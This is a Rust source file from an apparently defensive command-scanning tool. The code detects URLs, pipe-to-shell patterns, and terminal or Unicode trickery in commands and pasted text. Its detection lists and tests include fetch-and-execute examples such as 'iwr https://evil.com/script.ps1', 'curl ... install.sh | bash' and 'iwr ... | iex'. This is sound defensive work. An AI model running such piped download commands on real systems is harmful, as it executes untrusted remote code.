Skip to main content

tirith_core/
extract.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
/// Selects which Tier 1 pattern set `tier1_scan` applies to its input.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ScanContext {
    /// A command that is about to be executed (the `check` subcommand).
    Exec,
    /// Content that is being pasted (the `paste` subcommand).
    Paste,
}
15
16// Include generated Tier 1 patterns from build.rs declarative pattern table.
17#[allow(dead_code)]
18mod tier1_generated {
19    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
20}
21
22/// Tier 1 exec-time regex — generated from declarative pattern table in build.rs.
23static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
24    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
25});
26
27/// Tier 1 paste-time regex — exec patterns PLUS paste-only patterns (e.g. non-ASCII).
28static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
29    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
30});
31
32/// Standard URL extraction regex for Tier 3.
33static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
34    Regex::new(
35        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
36    )
37    .expect("url regex must compile")
38});
39
/// Outcome of the paste-time byte scan performed by `scan_bytes`.
///
/// Each flag summarizes one category of finding; `details` lists the individual findings.
pub struct ByteScanResult {
    /// At least one ANSI escape sequence was found.
    pub has_ansi_escapes: bool,
    /// At least one control character was found.
    pub has_control_chars: bool,
    /// At least one bidirectional control character was found.
    pub has_bidi_controls: bool,
    /// At least one zero-width character was found.
    pub has_zero_width: bool,
    /// The scanned input is not valid UTF-8.
    pub has_invalid_utf8: bool,
    /// Individual findings, in the order they were recorded.
    pub details: Vec<ByteFinding>,
}

/// A single finding recorded during the byte scan.
pub struct ByteFinding {
    /// Byte offset in the scanned input at which the finding starts.
    pub offset: usize,
    /// The byte located at `offset`.
    pub byte: u8,
    /// Human-readable description of the finding.
    pub description: String,
}
55
56/// Tier 1: Fast scan for URL-like content. Returns true if full analysis needed.
57pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
58    match context {
59        ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
60        ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
61    }
62}
63
64/// Scan raw bytes for control characters (paste-time, Tier 1 step 1).
65pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
66    let mut result = ByteScanResult {
67        has_ansi_escapes: false,
68        has_control_chars: false,
69        has_bidi_controls: false,
70        has_zero_width: false,
71        has_invalid_utf8: false,
72        details: Vec::new(),
73    };
74
75    // Check for invalid UTF-8
76    if std::str::from_utf8(input).is_err() {
77        result.has_invalid_utf8 = true;
78    }
79
80    let len = input.len();
81    let mut i = 0;
82    while i < len {
83        let b = input[i];
84
85        // ANSI escape sequences
86        if b == 0x1b && i + 1 < len && input[i + 1] == b'[' {
87            result.has_ansi_escapes = true;
88            result.details.push(ByteFinding {
89                offset: i,
90                byte: b,
91                description: "ANSI escape sequence".to_string(),
92            });
93            i += 2;
94            continue;
95        }
96
97        // Control characters (< 0x20, excluding common whitespace)
98        if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b && (b == b'\r' || b == 0x08) {
99            result.has_control_chars = true;
100            result.details.push(ByteFinding {
101                offset: i,
102                byte: b,
103                description: format!("control character 0x{b:02x}"),
104            });
105        }
106
107        // Check for UTF-8 multi-byte sequences that are bidi or zero-width
108        if b >= 0xc0 {
109            // Try to decode UTF-8 character
110            let remaining = &input[i..];
111            if let Some(ch) = std::str::from_utf8(remaining)
112                .ok()
113                .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
114                .and_then(|s| s.chars().next())
115            {
116                // Bidi controls
117                if is_bidi_control(ch) {
118                    result.has_bidi_controls = true;
119                    result.details.push(ByteFinding {
120                        offset: i,
121                        byte: b,
122                        description: format!("bidi control U+{:04X}", ch as u32),
123                    });
124                }
125                // Zero-width characters
126                if is_zero_width(ch) {
127                    result.has_zero_width = true;
128                    result.details.push(ByteFinding {
129                        offset: i,
130                        byte: b,
131                        description: format!("zero-width character U+{:04X}", ch as u32),
132                    });
133                }
134                i += ch.len_utf8();
135                continue;
136            }
137        }
138
139        i += 1;
140    }
141
142    result
143}
144
/// Returns `true` when `ch` is one of the bidirectional control characters tracked here:
/// LRM/RLM (U+200E–U+200F), LRE/RLE/PDF/LRO/RLO (U+202A–U+202E) and
/// LRI/RLI/FSI/PDI (U+2066–U+2069).
fn is_bidi_control(ch: char) -> bool {
    matches!(
        ch,
        '\u{200E}'..='\u{200F}' | '\u{202A}'..='\u{202E}' | '\u{2066}'..='\u{2069}'
    )
}
162
/// Returns `true` when `ch` is one of the zero-width characters tracked here:
/// ZWSP/ZWNJ/ZWJ (U+200B–U+200D) or BOM / ZWNBSP (U+FEFF).
fn is_zero_width(ch: char) -> bool {
    matches!(ch, '\u{200B}'..='\u{200D}' | '\u{FEFF}')
}
173
174/// Tier 3: Extract URL-like patterns from a command string.
175/// Uses shell-aware tokenization, then extracts URLs from each segment.
176pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
177    let segments = tokenize::tokenize(input, shell);
178    let mut results = Vec::new();
179
180    for segment in &segments {
181        // Extract standard URLs from raw text
182        for mat in URL_REGEX.find_iter(&segment.raw) {
183            let raw = mat.as_str().to_string();
184            let url = parse::parse_url(&raw);
185            results.push(ExtractedUrl {
186                raw,
187                parsed: url,
188                segment_index: results.len(),
189                in_sink_context: is_sink_context(segment, &segments),
190            });
191        }
192
193        // Check for schemeless URLs in sink contexts
194        // Skip for docker/podman/nerdctl commands since their args are handled as DockerRef
195        let is_docker_cmd = segment.command.as_ref().is_some_and(|cmd| {
196            let cmd_lower = cmd.to_lowercase();
197            matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl")
198        });
199        if is_sink_context(segment, &segments) && !is_docker_cmd {
200            for arg in &segment.args {
201                let clean = strip_quotes(arg);
202                if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
203                    results.push(ExtractedUrl {
204                        raw: clean.clone(),
205                        parsed: UrlLike::SchemelessHostPath {
206                            host: extract_host_from_schemeless(&clean),
207                            path: extract_path_from_schemeless(&clean),
208                        },
209                        segment_index: results.len(),
210                        in_sink_context: true,
211                    });
212                }
213            }
214        }
215
216        // Check for Docker refs in docker commands
217        if let Some(cmd) = &segment.command {
218            let cmd_lower = cmd.to_lowercase();
219            if matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl") {
220                if let Some(docker_subcmd) = segment.args.first() {
221                    let subcmd_lower = docker_subcmd.to_lowercase();
222                    if matches!(
223                        subcmd_lower.as_str(),
224                        "pull" | "run" | "build" | "create" | "image"
225                    ) {
226                        // The image ref is typically the last non-flag argument
227                        for arg in segment.args.iter().skip(1) {
228                            let clean = strip_quotes(arg);
229                            if !clean.starts_with('-') && !clean.contains("://") {
230                                let docker_url = parse::parse_docker_ref(&clean);
231                                results.push(ExtractedUrl {
232                                    raw: clean,
233                                    parsed: docker_url,
234                                    segment_index: results.len(),
235                                    in_sink_context: true,
236                                });
237                            }
238                        }
239                    }
240                }
241            }
242        }
243    }
244
245    results
246}
247
248/// An extracted URL with context.
249#[derive(Debug, Clone)]
250pub struct ExtractedUrl {
251    pub raw: String,
252    pub parsed: UrlLike,
253    pub segment_index: usize,
254    pub in_sink_context: bool,
255}
256
257/// Check if a segment is in a "sink" context (executing/downloading).
258fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
259    if let Some(cmd) = &segment.command {
260        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
261        let cmd_lower = cmd_base.to_lowercase();
262        if is_source_command(&cmd_lower) {
263            return true;
264        }
265    }
266
267    // Check if this segment pipes into a sink
268    if let Some(sep) = &segment.preceding_separator {
269        if sep == "|" || sep == "|&" {
270            // This segment receives piped input — check if it's an interpreter
271            if let Some(cmd) = &segment.command {
272                let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
273                if is_interpreter(cmd_base) {
274                    return true;
275                }
276            }
277        }
278    }
279
280    false
281}
282
/// Returns `true` when `cmd` is exactly (case-sensitively) one of the download / fetch /
/// package-manager command names listed below. Callers are expected to pass a lowercase
/// base name.
fn is_source_command(cmd: &str) -> bool {
    const SOURCE_COMMANDS: &[&str] = &[
        "curl",
        "wget",
        "fetch",
        "scp",
        "rsync",
        "git",
        "ssh",
        "docker",
        "podman",
        "nerdctl",
        "pip",
        "pip3",
        "npm",
        "npx",
        "yarn",
        "pnpm",
        "go",
        "cargo",
        "iwr",
        "irm",
        "invoke-webrequest",
        "invoke-restmethod",
    ];
    SOURCE_COMMANDS.contains(&cmd)
}
310
/// Returns `true` when `cmd` is exactly (case-sensitively) one of the shell / script
/// interpreter names listed below.
fn is_interpreter(cmd: &str) -> bool {
    const INTERPRETERS: &[&str] = &[
        "sh",
        "bash",
        "zsh",
        "dash",
        "ksh",
        "python",
        "python3",
        "node",
        "perl",
        "ruby",
        "php",
        "iex",
        "invoke-expression",
    ];
    INTERPRETERS.contains(&cmd)
}
328
/// Trims surrounding whitespace from `s` and removes one pair of matching surrounding
/// quotes (`"..."` or `'...'`) if present.
///
/// The opening and closing quote must be two distinct characters, so a lone `"` or `'`
/// is returned unchanged instead of being treated as an (empty) quoted string. Mismatched
/// quotes are left in place.
fn strip_quotes(s: &str) -> String {
    let trimmed = s.trim();
    let inner = trimmed
        .strip_prefix('"')
        .and_then(|rest| rest.strip_suffix('"'))
        .or_else(|| {
            trimmed
                .strip_prefix('\'')
                .and_then(|rest| rest.strip_suffix('\''))
        })
        .unwrap_or(trimmed);
    inner.to_string()
}
337
/// Heuristic: does `s` look like a URL written without a scheme (`example.com/path`)?
///
/// The host part is everything before the first `/`. The argument is accepted when:
/// - `s` does not start with `-` (not a flag);
/// - the host part contains a `.` and no space;
/// - the host part, lowercased, does not end in a known file extension
///   (so `install.sh` is treated as a file, not a host);
/// - the last dot-separated label of the host part is 2 to 6 ASCII letters.
fn looks_like_schemeless_host(s: &str) -> bool {
    // Suffixes that mark the host part as a file name rather than a domain.
    const FILE_EXTS: &[&str] = &[
        ".sh", ".py", ".rb", ".js", ".ts", ".go", ".rs", ".c", ".h", ".txt", ".md", ".json",
        ".yaml", ".yml", ".xml", ".html", ".css", ".tar.gz", ".tar.bz2", ".tar.xz", ".tgz", ".zip",
        ".gz", ".bz2", ".rpm", ".deb", ".pkg", ".dmg", ".exe", ".msi", ".dll", ".so", ".log",
        ".conf", ".cfg", ".ini", ".toml",
    ];

    let host = match s.find('/') {
        Some(slash) => &s[..slash],
        None => s,
    };

    // A dot in the host part implies a dot in `s`, so one check covers both.
    let shaped_like_host = !s.starts_with('-') && host.contains('.') && !host.contains(' ');
    if !shaped_like_host {
        return false;
    }

    let host_lc = host.to_lowercase();
    for ext in FILE_EXTS {
        if host_lc.ends_with(ext) {
            return false;
        }
    }

    // The host contains a dot, so there are always at least two labels; inspect the last.
    let tld = host.rsplit('.').next().unwrap_or(host);
    (2..=6).contains(&tld.len()) && tld.bytes().all(|c| c.is_ascii_alphabetic())
}
369
/// Returns the host part of a schemeless URL: everything before the first `/`, or the
/// whole string when there is no `/`.
fn extract_host_from_schemeless(s: &str) -> String {
    match s.find('/') {
        Some(slash) => s[..slash].to_string(),
        None => s.to_string(),
    }
}
373
/// Returns the path part of a schemeless URL: everything from the first `/` (inclusive),
/// or an empty string when there is no `/`.
fn extract_path_from_schemeless(s: &str) -> String {
    s.find('/')
        .map_or_else(String::new, |slash| s[slash..].to_string())
}
381
#[cfg(test)]
mod tests {
    use super::*;

    /// Tier 1 gate result for `input` in exec context.
    fn exec_hit(input: &str) -> bool {
        tier1_scan(input, ScanContext::Exec)
    }

    /// Tier 1 gate result for `input` in paste context.
    fn paste_hit(input: &str) -> bool {
        tier1_scan(input, ScanContext::Paste)
    }

    /// Tier 3 extraction with POSIX tokenization.
    fn posix_urls(input: &str) -> Vec<ExtractedUrl> {
        extract_urls(input, ShellType::Posix)
    }

    // --- Tier 1, exec context ---

    #[test]
    fn test_tier1_exec_matches_url() {
        assert!(exec_hit("curl https://example.com"));
    }

    #[test]
    fn test_tier1_exec_no_match_simple() {
        assert!(!exec_hit("ls -la"));
    }

    #[test]
    fn test_tier1_exec_no_match_echo() {
        assert!(!exec_hit("echo hello world"));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bash() {
        assert!(exec_hit("something | bash"));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_sudo_bash() {
        assert!(exec_hit("something | sudo bash"));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_env_bash() {
        assert!(exec_hit("something | env bash"));
    }

    #[test]
    fn test_tier1_exec_matches_pipe_bin_bash() {
        assert!(exec_hit("something | /bin/bash"));
    }

    #[test]
    fn test_tier1_exec_matches_git_scp() {
        assert!(exec_hit("git clone git@github.com:user/repo"));
    }

    #[test]
    fn test_tier1_exec_matches_punycode() {
        assert!(exec_hit("curl https://xn--example-cua.com"));
    }

    #[test]
    fn test_tier1_exec_matches_docker() {
        assert!(exec_hit("docker pull malicious/image"));
    }

    #[test]
    fn test_tier1_exec_matches_iwr() {
        assert!(exec_hit("iwr https://evil.com/script.ps1"));
    }

    #[test]
    fn test_tier1_exec_matches_curl() {
        assert!(exec_hit("curl https://example.com/install.sh"));
    }

    #[test]
    fn test_tier1_exec_matches_lookalike_tld() {
        assert!(exec_hit("open file.zip"));
    }

    #[test]
    fn test_tier1_exec_matches_shortener() {
        assert!(exec_hit("curl bit.ly/abc"));
    }

    // --- Tier 1, paste context ---

    #[test]
    fn test_tier1_paste_matches_non_ascii() {
        assert!(paste_hit("café"));
    }

    #[test]
    fn test_tier1_paste_exec_patterns_also_match() {
        assert!(paste_hit("curl https://example.com"));
    }

    #[test]
    fn test_tier1_exec_no_non_ascii() {
        // Non-ASCII alone must not trigger the exec-time gate.
        assert!(!exec_hit("echo café"));
    }

    // --- Byte scan ---

    #[test]
    fn test_byte_scan_ansi() {
        let scanned = scan_bytes(b"hello \x1b[31mred\x1b[0m world");
        assert!(scanned.has_ansi_escapes);
    }

    #[test]
    fn test_byte_scan_control_chars() {
        let scanned = scan_bytes(b"hello\rworld");
        assert!(scanned.has_control_chars);
    }

    #[test]
    fn test_byte_scan_bidi() {
        let scanned = scan_bytes("hello\u{202E}dlrow".as_bytes());
        assert!(scanned.has_bidi_controls);
    }

    #[test]
    fn test_byte_scan_zero_width() {
        let scanned = scan_bytes("hel\u{200B}lo".as_bytes());
        assert!(scanned.has_zero_width);
    }

    #[test]
    fn test_byte_scan_clean() {
        let scanned = scan_bytes(b"hello world\n");
        assert!(!scanned.has_ansi_escapes);
        assert!(!scanned.has_control_chars);
        assert!(!scanned.has_bidi_controls);
        assert!(!scanned.has_zero_width);
    }

    // --- Tier 3 extraction ---

    #[test]
    fn test_extract_urls_basic() {
        let found = posix_urls("curl https://example.com/install.sh");
        assert_eq!(found.len(), 1);
        assert_eq!(found[0].raw, "https://example.com/install.sh");
    }

    #[test]
    fn test_extract_urls_pipe() {
        let found = posix_urls("curl https://example.com/install.sh | bash");
        assert!(!found.is_empty());
        assert!(found[0].in_sink_context);
    }

    #[test]
    fn test_extract_urls_scp() {
        let found = posix_urls("git clone git@github.com:user/repo.git");
        assert!(!found.is_empty());
        assert!(matches!(found[0].parsed, UrlLike::Scp { .. }));
    }

    #[test]
    fn test_extract_docker_ref() {
        let docker_ref_count = posix_urls("docker pull nginx")
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .count();
        assert_eq!(docker_ref_count, 1);
    }

    #[test]
    fn test_extract_powershell_iwr() {
        let found = extract_urls(
            "iwr https://example.com/script.ps1 | iex",
            ShellType::PowerShell,
        );
        assert!(!found.is_empty());
    }

    /// Constraint #2: module boundary enforcement.
    ///
    /// Checks that the generated `EXTRACTOR_IDS` is non-empty, that there is at least one
    /// exec fragment, that the paste fragment count is not smaller than the exec count,
    /// and that both generated patterns compile — so that no extractor exists outside the
    /// declarative pattern table.
    #[test]
    fn test_tier1_module_boundary_enforcement() {
        // Extractor IDs must have been generated.
        assert!(
            !tier1_generated::EXTRACTOR_IDS.is_empty(),
            "EXTRACTOR_IDS must not be empty"
        );

        // Fragment counts: exec is non-empty and paste covers at least as many.
        let exec_fragments = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
        let paste_fragments = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
        assert!(exec_fragments > 0, "Must have exec fragments");
        assert!(
            paste_fragments >= exec_fragments,
            "Paste fragments must be superset of exec fragments"
        );

        // Both generated patterns must be valid regexes.
        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
            .expect("Generated exec pattern must be valid regex");
        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
            .expect("Generated paste pattern must be valid regex");
    }
}